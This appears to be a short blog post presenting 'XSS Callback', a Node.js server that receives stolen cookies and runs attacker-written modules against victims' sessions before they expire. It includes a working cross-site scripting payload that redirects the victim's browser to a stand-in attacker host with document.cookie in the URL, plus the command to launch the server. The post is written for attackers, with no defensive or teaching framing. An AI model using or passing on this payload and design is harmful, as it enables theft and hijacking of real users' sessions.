This post deals with a project I developed : XSS Callback.
This is not going to be (at least, I hope) a boring post about XSS exploitation. No.
Well, one scenario of using XSS would be to steal victim’s cookie and access the page through his session. This technique is called Session Hijacking. Ok fair enough.
However, some issues are present using this technique, let’s take an example :
- You target a website
- Unfortunately, it’s too late (or too early depending on your situation) and you go to sleep.
- You wake up in the night and there are loads of victims’s sessions. Great !
The only problem : the user might have logged out of the platform or there might be a timeout on the session.
**What would you do next ? ** Well.. nothing much. You got lot of data but they are useless now.
I had the idea to create a basic HTTP Server using Node.js that will trigger a procedure when it will be called. When launching this server, a route has been created which has this format :
http://malicious.com/cookie/<my-cookie>
Ok.. I guess you got it.
You can now insert some malicious payload like this :
<script>document.location='http://malicious.com/cookie/'+document.cookie</script>
The cookie will be inserted in the URL and loaded on the client-side. This means that you can go to sleep without any fear : All the victims who will load this URL will trigger an event on the server. The server will then execute the code you developed on the server-side (and log user cookies if you want to).
Moreover, the idea of this code is completely generic that you can adapt for all web applications and the only thing you now have to do is : write your own offensive module. You’ll be able to launch the Node.js server with your own module using this command :
node server.js path/to/my/module
Using the strenght of Node.js and the amount of modules, you can manage to create any attack you want to perform really easily.
So.. hope you liked it and see you next time :-)